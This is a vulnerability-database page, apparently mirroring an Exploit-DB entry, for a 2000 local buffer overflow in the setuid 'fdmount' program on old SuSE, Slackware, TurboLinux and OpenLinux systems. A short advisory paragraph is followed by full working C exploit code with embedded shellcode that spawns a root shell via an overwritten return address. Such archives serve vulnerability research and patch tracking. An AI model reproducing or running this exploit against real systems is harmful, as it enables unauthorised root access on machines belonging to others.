Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdbWaREDB-ID:19954
HistoryMay 22, 2000 - 12:00 a.m.

S.u.S.E Linux 4.x/5.x/6.x/7.0 / Slackware 3.x/4.0 / Turbolinux 6 / OpenLinux 7.0 - 'fdmount' Local Buffer Overflow (3)

2000-05-2200:00:00
WaR
www.exploit-db.com
15

AI Score

7.4

Confidence

Low

JSON
// source: https://www.securityfocus.com/bid/1239/info
  
A buffer overflow exists in the 0.8 version of the fdmount program, distributed with a number of popular versions of Linux. By supplying a large, well crafted buffer containing machine executable code in place of the mount point, it is possible for users in the 'floppy' group to execute arbitrary commands as root.
  
This vulnerability exists in versions of S.u.S.E., 4.0 and later, as well as Mandrake Linux 7.0. TurboLinux 6.0 and earlier ships with fdmount suid root, but users are not automatically added to the 'floppy' group. This list is by no means meant to be complete; other Linux distributions may be affected. To check if you're affected, check for the presence of the setuid bit on the binary. If it is present, and the binary is either world executable, or group 'floppy' executable, you are affected and should take action immediately. 

/* fdmount exploit
 *
 * by [WaR] <[email protected]> and Zav <[email protected]>
 *
 * usage: ./fdmountx <offset>
 *   try with offset around 390 (you'll only get one try) 
 *
 *  Shout outs to all of the GenHex crew, and to 
 *            the #newbreed at irc.ptnet.org.
 */

#include <stdio.h>
#include <stdlib.h>

#define BUFFSIZE 70

char shell[] = /* by Zav */
   "\xeb\x33\x5e\x89\x76\x08\x31\xc0"
   "\x88\x66\x07\x83\xee\x02\x31\xdb"
   "\x89\x5e\x0e\x83\xc6\x02\xb0\x1b"
   "\x24\x0f\x8d\x5e\x08\x89\xd9\x83"
   "\xee\x02\x8d\x5e\x0e\x89\xda\x83"
   "\xc6\x02\x89\xf3\xcd\x80\x31\xdb"
   "\x89\xd8\x40\xcd\x80\xe8\xc8\xff"
   "\xff\xff/bin/sh";


main(int argc, char **argv)
{
  int i,j;
  char buffer[BUFFSIZE+6]; 
  unsigned long eip=(unsigned long)&eip;
  unsigned long *ptr;


  if(argc>1)
   eip+=atoi(argv[1]);

  memset(buffer,0x90,75);
  memcpy(buffer+(BUFFSIZE-strlen(shell)),shell,strlen(shell));

 ptr=(unsigned long*)(buffer+71);
 *ptr=eip;

 buffer[75]=0;
 buffer[0]='/';

 execl("/usr/bin/fdmount","fdmount","fd0",buffer,NULL);
}

Related

cvelist 1
exploitdb 2
cve 1
nvd 1
cvelist
cvelist
CVE-2000-0438
2000-07-12 04:00:00
exploitdb
exploitdb
S.u.S.E Linux 4.x/5.x/6.x/7.0 / Slackware 3.x/4.0 / Turbolinux 6 / OpenLinux 7.0 - &#039;fdmount&#039; Local Buffer Overflow (1)
2000-05-22 00:00:00
S.u.S.E Linux 4.x/5.x/6.x/7.0 / Slackware 3.x/4.0 / Turbolinux 6 / OpenLinux 7.0 - &#039;fdmount&#039; Local Buffer Overflow (2)
2000-05-22 00:00:00
cve
cve
CVE-2000-0438
2000-07-12 04:00:00
nvd
nvd
CVE-2000-0438
2000-05-22 04:00:00

AI Score

7.4

Confidence

Low

JSON
Related for EDB-ID:19954
cvelist1exploitdb2cve1nvd1